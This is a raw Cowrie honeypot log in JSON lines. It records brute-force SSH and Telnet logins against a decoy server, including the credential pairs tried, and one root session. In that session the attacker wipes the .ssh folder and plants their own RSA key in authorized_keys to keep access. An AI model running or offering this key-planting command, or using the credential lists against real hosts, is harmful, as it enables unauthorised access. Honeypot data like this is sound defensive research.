{"eventid":"cowrie.login.failed","username":"luis","password":"12345678","message":"login attempt [luis/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T04:23:57.004860Z","src_ip":"212.227.235.229","session":"e826a857d76c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:58.256346Z","src_ip":"212.227.235.229","session":"e826a857d76c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62156,"dst_ip":"1.2.3.4","dst_port":22,"session":"261558830058","protocol":"ssh","message":"New connection: 217.72.205.35:62156 (1.2.3.4:22) [session: 261558830058]","sensor":"my-vps","timestamp":"2025-08-26T04:24:44.783454Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:24:44.784629Z","src_ip":"217.72.205.35","session":"261558830058"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:24:55.707207Z","src_ip":"212.227.235.229","session":"216858217c76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47258,"dst_ip":"1.2.3.4","dst_port":22,"session":"d53aedf19559","protocol":"ssh","message":"New connection: 212.227.235.229:47258 (1.2.3.4:22) [session: d53aedf19559]","sensor":"my-vps","timestamp":"2025-08-26T04:24:59.092267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:24:59.093052Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34724,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7014e7522e4","protocol":"ssh","message":"New connection: 212.227.235.229:34724 (1.2.3.4:22) [session: c7014e7522e4]","sensor":"my-vps","timestamp":"2025-08-26T04:24:59.125165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:24:59.125815Z","src_ip":"212.227.235.229","session":"c7014e7522e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:24:59.198275Z","src_ip":"212.227.235.229","session":"c7014e7522e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:24:59.371003Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Password01!","message":"login attempt [ubuntu/Password01!] failed","sensor":"my-vps","timestamp":"2025-08-26T04:24:59.528796Z","src_ip":"212.227.235.229","session":"c7014e7522e4"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":59846,"dst_ip":"1.2.3.4","dst_port":23,"session":"7cced68f3104","protocol":"telnet","message":"New connection: 3.131.215.38:59846 (1.2.3.4:23) [session: 7cced68f3104]","sensor":"my-vps","timestamp":"2025-08-26T04:25:00.522336Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Oracle37211wdv","message":"login attempt [root/Oracle37211wdv] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:25:00.524874Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:25:00.602793Z","src_ip":"212.227.235.229","session":"c7014e7522e4"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-26T04:25:00.735099Z","src_ip":"3.131.215.38","session":"7cced68f3104"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-26T04:25:00.735877Z","src_ip":"3.131.215.38","session":"7cced68f3104"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-26T04:25:00.736938Z","src_ip":"3.131.215.38","session":"7cced68f3104"}
{"eventid":"cowrie.session.closed","duration":0.3412463665008545,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:25:00.863488Z","src_ip":"3.131.215.38","session":"7cced68f3104"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:25:01.139113Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:25:01.139835Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:25:01.141139Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:25:01.420167Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:25:02.010026Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:25:02.011330Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:25:02.293185Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:25:02.294784Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47262,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb856cef9864","protocol":"ssh","message":"New connection: 212.227.235.229:47262 (1.2.3.4:22) [session: fb856cef9864]","sensor":"my-vps","timestamp":"2025-08-26T04:25:02.572912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:25:02.573999Z","src_ip":"212.227.235.229","session":"fb856cef9864"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:25:02.854227Z","src_ip":"212.227.235.229","session":"fb856cef9864"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:25:04.019614Z","src_ip":"212.227.235.229","session":"fb856cef9864"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:25:05.302799Z","src_ip":"212.227.235.229","session":"fb856cef9864"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60044,"dst_ip":"1.2.3.4","dst_port":22,"session":"294f62264499","protocol":"ssh","message":"New connection: 212.227.235.229:60044 (1.2.3.4:22) [session: 294f62264499]","sensor":"my-vps","timestamp":"2025-08-26T04:25:05.579543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:25:05.580354Z","src_ip":"212.227.235.229","session":"294f62264499"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:25:05.859200Z","src_ip":"212.227.235.229","session":"294f62264499"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":43778,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f1f0517f9e2","protocol":"ssh","message":"New connection: 103.217.145.104:43778 (1.2.3.4:22) [session: 7f1f0517f9e2]","sensor":"my-vps","timestamp":"2025-08-26T04:25:06.514265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:25:06.515565Z","src_ip":"103.217.145.104","session":"7f1f0517f9e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:25:06.786963Z","src_ip":"103.217.145.104","session":"7f1f0517f9e2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:25:07.018301Z","src_ip":"212.227.235.229","session":"294f62264499"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:25:07.299200Z","src_ip":"212.227.235.229","session":"294f62264499"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:25:07.300312Z","src_ip":"212.227.235.229","session":"d53aedf19559"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"123456","message":"login attempt [monitor/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:25:07.869296Z","src_ip":"103.217.145.104","session":"7f1f0517f9e2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:25:09.142690Z","src_ip":"103.217.145.104","session":"7f1f0517f9e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42258,"dst_ip":"1.2.3.4","dst_port":22,"session":"42256a93d449","protocol":"ssh","message":"New connection: 212.227.235.229:42258 (1.2.3.4:22) [session: 42256a93d449]","sensor":"my-vps","timestamp":"2025-08-26T04:25:59.827995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:25:59.828737Z","src_ip":"212.227.235.229","session":"42256a93d449"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:26:00.096667Z","src_ip":"212.227.235.229","session":"42256a93d449"}
{"eventid":"cowrie.login.failed","username":"sa","password":"sa123456","message":"login attempt [sa/sa123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:26:01.209616Z","src_ip":"212.227.235.229","session":"42256a93d449"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:26:02.480150Z","src_ip":"212.227.235.229","session":"42256a93d449"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53194,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a5d59e7af60","protocol":"ssh","message":"New connection: 212.227.235.229:53194 (1.2.3.4:22) [session: 5a5d59e7af60]","sensor":"my-vps","timestamp":"2025-08-26T04:26:13.415802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:26:13.416709Z","src_ip":"212.227.235.229","session":"5a5d59e7af60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:26:13.693680Z","src_ip":"212.227.235.229","session":"5a5d59e7af60"}
{"eventid":"cowrie.login.failed","username":"sftp_user","password":"123","message":"login attempt [sftp_user/123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:26:14.842476Z","src_ip":"212.227.235.229","session":"5a5d59e7af60"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:26:16.123260Z","src_ip":"212.227.235.229","session":"5a5d59e7af60"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":39426,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c417e581eeb","protocol":"ssh","message":"New connection: 103.217.145.104:39426 (1.2.3.4:22) [session: 3c417e581eeb]","sensor":"my-vps","timestamp":"2025-08-26T04:26:30.172281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:26:30.173187Z","src_ip":"103.217.145.104","session":"3c417e581eeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:26:30.443723Z","src_ip":"103.217.145.104","session":"3c417e581eeb"}
{"eventid":"cowrie.login.failed","username":"web","password":"12345678","message":"login attempt [web/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T04:26:31.564806Z","src_ip":"103.217.145.104","session":"3c417e581eeb"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:26:32.835926Z","src_ip":"103.217.145.104","session":"3c417e581eeb"}
